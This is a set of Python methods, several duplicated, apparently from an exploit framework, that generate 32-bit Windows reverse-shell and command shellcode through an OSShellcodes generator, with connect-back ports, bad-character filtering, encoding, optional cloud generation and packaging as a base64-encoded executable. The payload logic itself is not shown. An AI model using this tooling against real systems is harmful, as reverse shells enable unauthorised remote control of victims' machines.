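def create_shellcode(self):
    """Build a 32-bit Windows payload through OSShellcodes and return it.

    The payload type is 'reverse' on the listener's port when
    ``self.args['listener']`` is set; otherwise it is 'command' and port
    5555 is passed to the generator.

    Returns:
        The generated shellcode, or False when the generator produced
        nothing.
    """
    self.log("[] Generate shellcode started")
    # Values passed to the generator and re-checked in the output below:
    # NUL and 0x3B (';').
    badstring = ["\x00", "\x3B"]
    ip = self.connectback_ip
    port = 5555
    shellcode_type = 'command'
    if self.args['listener']:
        port = int(self.args['listener']['PORT'])
        shellcode_type = 'reverse'
    os_target = "WINDOWS"
    os_arch = '32bit'
    s = OSShellcodes(os_target, os_arch, ip, port, badstring)
    # When cloud_generate is true, the request goes to the framework's
    # cloud shellcode server, which returns the generated shellcode
    # base64-encoded; create_shellcode decodes it, so the caller receives
    # ordinary shellcode. The server address is set in config.py in the
    # root directory of the East framework.
    # NOTE(review): with cloud generation the payload content is decided by
    # that remote server; how the connection is authenticated or protected
    # is not visible here -- confirm before relying on it.
    shellcode = s.create_shellcode(
        shellcode_type,
        encode=1,
        debug=1,
        cloud_generate=self.cloud_generate,
    )
    # A generator that returns nothing (e.g. None) must not reach the
    # membership test below, which would raise TypeError on a non-container.
    if not shellcode:
        return False
    # A hit is only reported on stdout; the shellcode is still returned.
    for bad in badstring:
        if bad in shellcode:
            print("FOUND BAD SYMBOL")
    return shellcode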
def create_shellcode(self):
    """Build an unencoded 32-bit Windows payload and return it.

    Stores the connect-back address and port on the instance. The payload
    type is 'reverse' on the listener's port when ``self.args['listener']``
    is set, otherwise 'command' with port 9999.
    """
    # The address is whatever the local resolver reports for this
    # machine's own hostname.
    self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())

    listener = self.args['listener']
    if not listener:
        shellcode_type, port = 'command', 9999
    else:
        shellcode_type = 'reverse'
        port = int(listener['PORT'])
    self.CONNECTBACK_PORT = port

    generator = OSShellcodes(
        'WINDOWS',
        '32bit',
        self.CONNECTBACK_IP,
        self.CONNECTBACK_PORT,
    )
    # Attribute read by OSShellcodes; its meaning is not visible in this block.
    generator.TIMESTAMP = 'codesys'
    return generator.create_shellcode(shellcode_type, encode=0, debug=1)
def create_shellcode(self):
    """Build a 32-bit Windows 'reverse' payload and return it.

    The port is the listener's port when ``self.args['listener']`` is set,
    otherwise 4000; it is also stored as ``self.CONNECTBACK_PORT``. The
    generator is asked for ``encode='xor'`` and is given NUL as the only
    value in its fifth argument.
    """
    self.log("Generate shellcode started")

    listener = self.args['listener']
    self.CONNECTBACK_PORT = int(listener['PORT']) if listener else 4000

    os_target = "WINDOWS"
    os_arch = '32bit'
    shellcode_type = 'reverse'
    # The connect-back address is whatever the local resolver reports for
    # this machine's own hostname.
    local_ip = socket.gethostbyname(socket.gethostname())
    generator = OSShellcodes(
        os_target,
        os_arch,
        local_ip,
        self.CONNECTBACK_PORT,
        ["\x00"],
    )
    shellcode = generator.create_shellcode(shellcode_type, encode='xor', debug=1)

    self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch))
    self.log("Length of shellcode: %d" % len(shellcode))
    self.log("Generate shellcode finished")
    return shellcode
def create_shellcode(self):
    """Build a 32-bit Windows 'reverse' payload and return it.

    The port is the listener's port when ``self.args['listener']`` is set,
    otherwise 4000; it is also stored as ``self.CONNECTBACK_PORT``. The
    generator is asked for ``encode='xor'`` and is given NUL as the only
    value in its fifth argument.
    """
    self.log("Generate shellcode started")

    listener = self.args['listener']
    self.CONNECTBACK_PORT = int(listener['PORT']) if listener else 4000

    os_target = "WINDOWS"
    os_arch = '32bit'
    shellcode_type = 'reverse'
    # The connect-back address is whatever the local resolver reports for
    # this machine's own hostname.
    local_ip = socket.gethostbyname(socket.gethostname())
    generator = OSShellcodes(
        os_target,
        os_arch,
        local_ip,
        self.CONNECTBACK_PORT,
        ["\x00"],
    )
    shellcode = generator.create_shellcode(shellcode_type, encode='xor', debug=1)

    self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch))
    self.log("Length of shellcode: %d" % len(shellcode))
    self.log("Generate shellcode finished")
    return shellcode
def create_shellcode(self):
    """Build a 32-bit Windows 'reverse' payload and return it.

    Stores the connect-back address and port on the instance. The port is
    the listener's port when ``self.args['listener']`` is set, otherwise
    5555. NUL and 0x3B (';') are passed to the generator as its fifth
    argument.
    """
    self.log("[] Generate shellcode started")
    badstring = ["\x00", "\x3b"]
    # The address is whatever the local resolver reports for this
    # machine's own hostname.
    self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())

    listener = self.args['listener']
    self.CONNECTBACK_PORT = int(listener['PORT']) if listener else 5555

    os_target = "WINDOWS"
    os_arch = '32bit'
    shellcode_type = 'reverse'
    generator = OSShellcodes(
        os_target,
        os_arch,
        self.CONNECTBACK_IP,
        self.CONNECTBACK_PORT,
        badstring,
    )
    shellcode = generator.create_shellcode(shellcode_type, encode=1, debug=1)
    # The raw payload is written to stdout, so it ends up in any console
    # capture or redirected output of the run.
    print(shellcode)

    self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch))
    self.log("Length of shellcode: %d" % len(shellcode))
    self.log("[] Generate shellcode finished")
    return shellcode
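def gen_shellcode(self):
    """Generate a payload from the options in ``self.s_o`` and return it base64-encoded.

    ``self.s_o`` supplies the keys "os", "arch", "ip", "port", "badchars",
    "type", "encode", "exe" and "command". When ``s_o["exe"]`` is truthy,
    the file at ``s.get_exe_path()`` is read and returned instead of the
    value ``create_shellcode`` returned.

    Returns:
        The base64 encoding of the payload, or False when generation
        raised an exception (the exception is printed).
    """
    try:
        # NOTE(review): a relative entry on sys.path is resolved against the
        # current working directory, so imports depend on where the process
        # was started. Add it once rather than on every call.
        if "shellcodes" not in sys.path:
            sys.path.append("shellcodes")
        s_o = self.s_o
        s = OSShellcodes(
            s_o["os"], s_o["arch"], s_o["ip"], s_o["port"], s_o["badchars"]
        )
        payload = s.create_shellcode(
            s_o["type"],
            encode=s_o["encode"],
            make_exe=s_o["exe"],
            command=s_o["command"],
            debug=1,
            filename="command.exe",
        )
    except Exception as e:
        print(e)
        return False
    if self.s_o["exe"]:
        # The executable is binary data: text mode would decode or
        # newline-translate it, and b64encode needs bytes.
        with open(s.get_exe_path(), "rb") as f:
            payload = f.read()
    return base64.b64encode(payload)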
def get_sc(self):
    """Generate a 32-bit Windows payload and store it on ``self.shellcode``.

    The payload type is 'reverse' on the listener's port when
    ``self.args['listener']`` is set, otherwise 'command' with port 9999.
    The values in ``self.BADCHARS`` (NUL, tab, line feed, space) are passed
    to the generator.

    Returns:
        1 when the generator returned a truthy value (which is then
        stored), 0 otherwise.
    """
    self.BADCHARS = ["\x00", "\x09", "\x0A", "\x20"]
    self.log("shell creating...")
    # The address is whatever the local resolver reports for this
    # machine's own hostname.
    self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())

    listener = self.args['listener']
    if not listener:
        shellcode_type, port = 'command', 9999
    else:
        shellcode_type = 'reverse'
        port = int(listener['PORT'])
    self.CONNECTBACK_PORT = port

    generator = OSShellcodes(
        'WINDOWS',
        '32bit',
        self.CONNECTBACK_IP,
        self.CONNECTBACK_PORT,
        self.BADCHARS,
    )
    result = generator.create_shellcode(shellcode_type, encode=1, debug=0)
    if not result:
        return 0
    self.shellcode = result
    return 1
def create_shellcode(self):
    """Build a 32-bit Windows 'reverse' payload and return it.

    Stores the connect-back address and port on the instance. The port is
    the listener's port when ``self.args['listener']`` is set, otherwise
    5555. NUL and 0x3B (';') are passed to the generator as its fifth
    argument.
    """
    self.log("[] Generate shellcode started")
    badstring = ["\x00", "\x3b"]
    # The address is whatever the local resolver reports for this
    # machine's own hostname.
    self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())

    listener = self.args['listener']
    self.CONNECTBACK_PORT = int(listener['PORT']) if listener else 5555

    os_target = "WINDOWS"
    os_arch = '32bit'
    shellcode_type = 'reverse'
    generator = OSShellcodes(
        os_target,
        os_arch,
        self.CONNECTBACK_IP,
        self.CONNECTBACK_PORT,
        badstring,
    )
    shellcode = generator.create_shellcode(shellcode_type, encode=1, debug=1)
    # The raw payload is written to stdout, so it ends up in any console
    # capture or redirected output of the run.
    print(shellcode)

    self.log("Shellcode type: %s for arch: %s" % (shellcode_type, os_arch))
    self.log("Length of shellcode: %d" % len(shellcode))
    self.log("[] Generate shellcode finished")
    return shellcode
def create_shellcode(self):
    """Build an unencoded 32-bit Windows payload and return it.

    Stores the connect-back address and port on the instance. The payload
    type is 'reverse' on the listener's port when ``self.args['listener']``
    is set, otherwise 'command' with port 9999.
    """
    # The address is whatever the local resolver reports for this
    # machine's own hostname.
    self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())

    listener = self.args['listener']
    if not listener:
        shellcode_type, port = 'command', 9999
    else:
        shellcode_type = 'reverse'
        port = int(listener['PORT'])
    self.CONNECTBACK_PORT = port

    generator = OSShellcodes(
        'WINDOWS',
        '32bit',
        self.CONNECTBACK_IP,
        self.CONNECTBACK_PORT,
    )
    # Attribute read by OSShellcodes; its meaning is not visible in this block.
    generator.TIMESTAMP = 'codesys'
    return generator.create_shellcode(shellcode_type, encode=0, debug=1)
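def gen_shellcode(self):
    """Generate a payload from the options in ``self.s_o`` and return it base64-encoded.

    ``self.s_o`` supplies the keys "os", "arch", "ip", "port", "badchars",
    "type", "encode", "exe" and "command". When ``s_o["exe"]`` is truthy,
    the file at ``s.get_exe_path()`` is read and returned instead of the
    value ``create_shellcode`` returned.

    Returns:
        The base64 encoding of the payload, or False when generation
        raised an exception (the exception is printed).
    """
    try:
        # NOTE(review): a relative entry on sys.path is resolved against the
        # current working directory, so imports depend on where the process
        # was started. Add it once rather than on every call.
        if "shellcodes" not in sys.path:
            sys.path.append("shellcodes")
        s_o = self.s_o
        s = OSShellcodes(
            s_o["os"], s_o["arch"], s_o["ip"], s_o["port"], s_o["badchars"]
        )
        payload = s.create_shellcode(
            s_o["type"],
            encode=s_o["encode"],
            make_exe=s_o["exe"],
            command=s_o["command"],
            debug=1,
            filename="command.exe",
        )
    except Exception as e:
        print(e)
        return False
    if self.s_o["exe"]:
        # The executable is binary data: text mode would decode or
        # newline-translate it, and b64encode needs bytes.
        with open(s.get_exe_path(), "rb") as f:
            payload = f.read()
    return base64.b64encode(payload)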